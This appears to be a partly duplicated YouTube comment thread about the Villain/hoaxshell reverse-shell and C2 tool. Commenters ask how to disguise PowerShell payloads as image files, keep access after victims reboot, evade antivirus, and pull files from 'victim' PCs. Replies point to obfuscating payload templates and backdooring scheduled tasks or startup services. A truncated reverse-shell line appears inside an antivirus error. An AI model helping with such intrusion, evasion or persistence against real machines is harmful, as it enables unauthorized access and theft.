Thank you, my friend, that you are not brilliant, but you talk and think that most of those who watch you are professionals. I hope you will take into account that we are new to this field.
how do i put hoaxshell payloads into : . ps1 file and just fake to. png or some image file extension, and when they click on it executed and just hide or close the powershell right away
When I execute the payload on the target machine windows doesn't flag it or stop it ,and it's like it worked but when I check back on the attacker computer there's no shell session? Does the victim computer also have to have netcat?
Hi @TAWSIF_EDITZ_OFFICIAL , port forwarding is something you configure from your router's web interface. *Keep in mind that the syntax for certain commands has changed in recent versions. Check the project on github for more info.
Hi one question... does the upload part only works for other Linux devices? i cant seem to get it to work from a Linux to Windows it even says success but the file does not appear anywhere
there's a bug in the coolest shell (the cmd one) but let's leave it like that. these who know a little bit of batch will be able to pinpoint this miniscule issue in a heartbeat and those that don't probably shouldn't be using it anyway. wish it was more stable though because i like the idea. gotta try expanding this one template
@@HaxorTechTones I hosted the c2 under my domain with a real cert, not self signed. hence i picked the hoax/https cmd with curl. The payload simply doesn't execute in the current version without a simple modification on windows 10. The problem lies in the iterational part of the payload, i already feel like i said too much. let's not get it signatured too early. it's a byte too short. the easiest way to understand it is to know the difference between pasting the payload into the cmd and launching it out of a bat file - that's how i spotted it. each of the ways of starting it gave me different errors so i pinpointed it rather quickly, but if you still wanna know i insist on different channels of communication
Dude, your project is great... But I have some issue with villain...I can't jumped into cmd, I am unable to download file and execute file through this shell.. And some commend doesn't work... can you tell me how to solve it... Please reply 🙏... Thank you
when i try using it, it doesnt send back any sort of connection or message at all to villain. i send it in powershell and did everything the exact same that you did. Any idea how to fix it?
Why does my netcat tcp reverse shell lose connection after a while without doing anything? I managed to establish the connection and after aprox 5 mins it loses connection, why is it doing that?
It shouldn't be doing this, never had that issue. You need to provide some info, maybe open an issue on github with screenshots. Does the shell session stop working or does villain mark the connection as lost? Are you sure there's no event occurring that leads to the session loss?
@@HaxorTechTones ok so I forgot to mention that i am using ngrok and it seems that the problem occurs only when using ngrok, because I don't have this problem inside my LAN.
Hi ! Do I need to use obf payload in order to use the upload tool ? I'm getting denied access response when I'm trying to copy simple texts to my desktop ?
@@HaxorTechTones It seems better but still not working, when I keep my hard disk name it says : the generic path isn't resolved when I just type the path from /users, as you did, it says : non-conforming character (translate from french, hope you will get it :/)
Ok just got it !!! The problem was that I kept writing the full path, like I was in C:/Users/TheGuyIAm and I kept writing C:/Users/TheGuyIAm/Desktop/TheFileIWant when I should have written /source_path \desktop\TheFileIWant
I need help. After uploading the payload to the powershell it won't establish the connection, it doesn't show the message:"Backdoor session established on ...".Does it only happen to me? Someone help me pls.
@@philxdes1573 The problem was that I had a bad configuration of kali linux in virtual studio code. Try going to the settings of the machine, to the network option and change the first option to bridge adapter.
Dude you doing great.. But how can we maintain persistent.. If we don't make persistent..then there is nothing in this tool.. Please tell me how can we maintain persistent
@@osmanali176 you can do it manually from within powershell... you can make a script that uploads files to dropbox using dropbox api... theres a tutorial here youtube.
No, you would have to work on persistence by e.g., injecting a malicious periodically executed task or backdoor a startup service. The content on this channel is for authorized assessments. Don't try weird monkey stuff against machines you do not have permission to test.
why am i getting this error when I try to do the same ? At line:1 char:1 + Start-Process $PSHOME\powershell.exe -ArgumentList {$client = New-Obj ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software. + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException + FullyQualifiedErrorId : ScriptContainedMaliciousContent
You're always making incredible projects, love what you do !
Thanks so much!! 🤩
A new subscriber for this dude here from Morocco
You are amazing man i love the project keep it up
Thx for your project . It is very fantastic
Thank you, my friend, that you are not brilliant, but you talk and think that most of those who watch you are professionals. I hope you will take into account that we are new to this field.
Wow awesome job t3l3machus ⚡⚡
Thank you!
Love this :)
Thank you 💚
Great work.
Thanks for the support!
🎉🎉🎉 love the new changes!
Amazing as always ❤❤
Great to see it! :)
Welcome back 🔙
Good to be back
Best my friend
Amazing bro 😍😍
This is so good, and you are one hell of a software developer👍 I hope your employer pays you well my friend!
how do i put hoaxshell payloads into : . ps1 file and just fake to. png or some image file extension, and when they click on it executed and just hide or close the powershell right away
When I execute the payload on the target machine windows doesn't flag it or stop it ,and it's like it worked but when I check back on the attacker computer there's no shell session? Does the victim computer also have to have netcat?
nice
How do I do port forwarding here?
Hi @TAWSIF_EDITZ_OFFICIAL , port forwarding is something you configure from your router's web interface.
*Keep in mind that the syntax for certain commands has changed in recent versions. Check the project on github for more info.
Hi one question... does the upload part only works for other Linux devices? i cant seem to get it to work from a Linux to Windows it even says success but the file does not appear anywhere
there's a bug in the coolest shell (the cmd one) but let's leave it like that. these who know a little bit of batch will be able to pinpoint this miniscule issue in a heartbeat and those that don't probably shouldn't be using it anyway. wish it was more stable though because i like the idea. gotta try expanding this one template
So, what's the bug mate?
@@HaxorTechTones I hosted the c2 under my domain with a real cert, not self signed. hence i picked the hoax/https cmd with curl. The payload simply doesn't execute in the current version without a simple modification on windows 10. The problem lies in the iterational part of the payload, i already feel like i said too much. let's not get it signatured too early. it's a byte too short. the easiest way to understand it is to know the difference between pasting the payload into the cmd and launching it out of a bat file - that's how i spotted it. each of the ways of starting it gave me different errors so i pinpointed it rather quickly, but if you still wanna know i insist on different channels of communication
Hi telemachus I want to know if the payload must be on the same network to function?
Dude, your project is great... But I have some issue with villain...I can't jumped into cmd, I am unable to download file and execute file through this shell.. And some commend doesn't work... can you tell me how to solve it... Please reply 🙏... Thank you
when i try using it, it doesnt send back any sort of connection or message at all to villain. i send it in powershell and did everything the exact same that you did. Any idea how to fix it?
товарищ
Error parasiong LHOST, Invalid Ip or interface am trying to use ngrok ):
Can i run .ps1 script on Kali into Windows Machine with Villain? Cause .ps1 script is detected by Windows Defender on Windows
Is it possibile to do a persistent shell?🙏
Why does my netcat tcp reverse shell lose connection after a while without doing anything?
I managed to establish the connection and after aprox 5 mins it loses connection, why is it doing that?
It shouldn't be doing this, never had that issue. You need to provide some info, maybe open an issue on github with screenshots. Does the shell session stop working or does villain mark the connection as lost? Are you sure there's no event occurring that leads to the session loss?
@@HaxorTechTones ok so I forgot to mention that i am using ngrok and it seems that the problem occurs only when using ngrok, because I don't have this problem inside my LAN.
My villain isn't working 😢
It doesn't get a reverse shell
I was wondering.. Can i download files by the victim PC?
Hi ! Do I need to use obf payload in order to use the upload tool ?
I'm getting denied access response when I'm trying to copy simple texts to my desktop ?
Make sure to add the file name to the path you want the file to be uploaded, not only the dir.
@@HaxorTechTones It seems better but still not working,
when I keep my hard disk name it says : the generic path isn't resolved
when I just type the path from /users, as you did, it says : non-conforming character (translate from french, hope you will get it :/)
Ok just got it !!!
The problem was that I kept writing the full path, like I was in C:/Users/TheGuyIAm and I kept writing C:/Users/TheGuyIAm/Desktop/TheFileIWant when I should have written /source_path \desktop\TheFileIWant
@@HaxorTechTones And thx ! You're the best !
One last question, I tried connecting to an FTP server using Villain but kept blocking at the connection step, is it normal or ?
Hello! What an incredible project! Tell me is there any way to migrate connection to meterpreter?
Hi, thanks! Not yet, working on it. Stay tuned!
how can i take a screenshots desktop
from the target machine
I need help. After uploading the payload to the powershell it won't establish the connection, it doesn't show the message:"Backdoor session established on ...".Does it only happen to me? Someone help me pls.
im having the same issue, have you figured it out?
@@philxdes1573 The problem was that I had a bad configuration of kali linux in virtual studio code. Try going to the settings of the machine, to the network option and change the first option to bridge adapter.
Hey bro your work is awesome... Can you please tell me how to persistent it.. How can we get connection afer reboot victim pc.. Thank you
Hey, thanks! That's kind of complex to pull off. I might make a video about it in the future :)
@@HaxorTechTones thanks bro😃
Hi bro
the backdoor work with php file ?
Sir, why can't I upload files?
how to use persistence? give me answer
does it support the single payload works for many victims as it previously supports only 1 payload 1 victim as far as i know
i dont think so...
You can use TCP socket based reverse shell commands to do that, those are reusable. The hoaxshell ones are one timers
Hello! is there a way to download stuff from the victim pc? I tried everything but couldn't maybe I just suck :*)
Hi, in an automated manner, like, "download /path/to/file", not yet unfortunately, but the feature will be added in a future update :)
@@HaxorTechTonesYoooo! You are the best
Dude you doing great.. But how can we maintain persistent.. If we don't make persistent..then there is nothing in this tool.. Please tell me how can we maintain persistent
Please make a video to port forwarding 🙏
obfuscate don t work anymore, can you say me tools for this?
well done do you accept pull requests?
Hi, thanks! Currently, I don't. kind of figuring out the direction of the project.
sir port forwarding
bro pls add download option.
thank you for the tool 💖
ok now we need how to bypass antivirus.
ua-cam.com/video/grSBdZdUya0/v-deo.html
Can we download files from the backdoor system?
not yet ¯\_(ツ)_/¯
@@HaxorTechTones ok bro
Can we download files using the shell?
@@osmanali176 you can do it manually from within powershell... you can make a script that uploads files to dropbox using dropbox api... theres a tutorial here youtube.
@@johnazure can you share me the link?
How can we bypass Anti-virus as these payloads are detecting it?
The trick is to edit the payload templates and replace the commands with obfuscated versions of them. I'll make a how-to video about it soon.
@@HaxorTechTones thanks bro I am waiting for it😁
if victom pc restart will vilain still work plz anwser ??
No, you would have to work on persistence by e.g., injecting a malicious periodically executed task or backdoor a startup service. The content on this channel is for authorized assessments. Don't try weird monkey stuff against machines you do not have permission to test.
@@HaxorTechTones i know i just ask and im 14 year im begener in hacking can if a make that file auto run file
sir, it is still detecting generate powershell. But i like your video.
buddy you need to add channel tags to get views
👍
It this work over internet by ngrok or something
dig a little bit ;)
you are amazing!!! How can upload to remote file path with blank spaces? = upload /localpath/text.txt
emotepath\blank space\text.txt?
why am i getting this error when I try to do the same ?
At line:1 char:1
+ Start-Process $PSHOME\powershell.exe -ArgumentList {$client = New-Obj ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
Because the payload is getting caught by your anti-virus. Check out this video on how to bypass it -> ua-cam.com/video/grSBdZdUya0/v-deo.html